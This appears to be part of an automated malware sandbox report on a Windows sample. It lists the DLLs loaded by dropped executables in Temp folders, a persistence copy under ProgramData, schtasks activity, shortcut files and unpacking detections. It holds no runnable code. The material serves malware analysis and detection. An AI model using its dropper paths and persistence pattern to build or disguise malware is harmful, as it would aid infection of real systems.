                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: windows.staterepositoryps.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: windows.fileexplorer.common.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: iertutil.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: explorerframe.dll
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: edputil.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: urlmon.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: iertutil.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: srvcli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: netutils.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: windows.staterepositoryps.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: appresolver.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: bcp47langs.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: slc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: sppc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: onecorecommonproxystub.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: onecoreuapcommonproxystub.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: pcacli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: sfc_os.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: rstrtmgr.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: ncrypt.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: ntasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: d3d11.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: dxgi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: resourcepolicyclient.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: d3d10warp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: dxcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: ntmarta.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: winhttp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: mswsock.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: devobj.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: webio.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: winnsi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: dnsapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: rasadhlp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: fwpuclnt.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: schannel.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: mskeyprotect.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: ncryptsslp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: msasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: gpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: vaultcli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: dpapi.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: apphelp.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winmm.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: rstrtmgr.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ncrypt.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ntasn1.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: d3d11.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: dxgi.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: resourcepolicyclient.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: kernel.appcore.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: d3d10warp.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: uxtheme.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: dxcore.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: sspicli.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winhttp.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wininet.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: mswsock.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: devobj.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: webio.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: iphlpapi.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winnsi.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: dnsapi.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: rasadhlp.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: fwpuclnt.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: schannel.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: mskeyprotect.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ncryptsslp.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: msasn1.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: cryptsp.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: rsaenh.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: cryptbase.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: gpapi.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: vaultcli.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wintypes.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: windows.storage.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wldp.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ntmarta.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: dpapi.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winmm.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: rstrtmgr.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ncrypt.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ntasn1.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: d3d11.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: dxgi.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: resourcepolicyclient.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: kernel.appcore.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: d3d10warp.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: uxtheme.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: dxcore.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: sspicli.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winhttp.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wininet.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: mswsock.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: devobj.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: webio.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: iphlpapi.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winnsi.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: dnsapi.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: rasadhlp.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: fwpuclnt.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: schannel.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: mskeyprotect.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ncryptsslp.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: msasn1.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: cryptsp.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: rsaenh.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: cryptbase.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: gpapi.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: vaultcli.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wintypes.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: windows.storage.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wldp.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ntmarta.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: dpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: edputil.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: urlmon.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: iertutil.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: srvcli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: netutils.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: windows.staterepositoryps.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: appresolver.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: bcp47langs.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: slc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: sppc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: onecorecommonproxystub.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: onecoreuapcommonproxystub.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: pcacli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: sfc_os.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: rstrtmgr.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: ncrypt.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: ntasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: d3d11.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: dxgi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: resourcepolicyclient.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: d3d10warp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: dxcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: winhttp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: mswsock.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: devobj.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: webio.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: winnsi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: dnsapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: rasadhlp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: fwpuclnt.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: schannel.dll
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                              Source: Google Drive.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                              Source: YouTube.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                              Source: Sheets.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                              Source: Gmail.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                              Source: Slides.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                              Source: Docs.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeAutomated click: OK
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeAutomated click: OK
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeAutomated click: OK
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                              Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\OfficeJump to behavior
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeStatic file information: File size 2962432 > 1048576
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeStatic PE information: Raw size of wvtamnbw is bigger than: 0x100000 < 0x2a1000

                              Data Obfuscation

                              barindex
                              Detected unpacking (changes PE section rights)
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeUnpacked PE file: 0.2.SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe.b80000.0.unpack :EW;.rsrc:W;.idata :W;wvtamnbw:EW;jjaorssu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;wvtamnbw:EW;jjaorssu:EW;.taggant:EW;
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeUnpacked PE file: 2.2.explorha.exe.700000.0.unpack :EW;.rsrc:W;.idata :W;wvtamnbw:EW;jjaorssu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;wvtamnbw:EW;jjaorssu:EW;.taggant:EW;
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeUnpacked PE file: 3.2.explorha.exe.700000.0.unpack :EW;.rsrc:W;.idata :W;wvtamnbw:EW;jjaorssu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;wvtamnbw:EW;jjaorssu:EW;.taggant:EW;
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeUnpacked PE file: 14.2.amert.exe.360000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fbupybke:EW;ejxqaids:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fbupybke:EW;ejxqaids:EW;.taggant:EW;
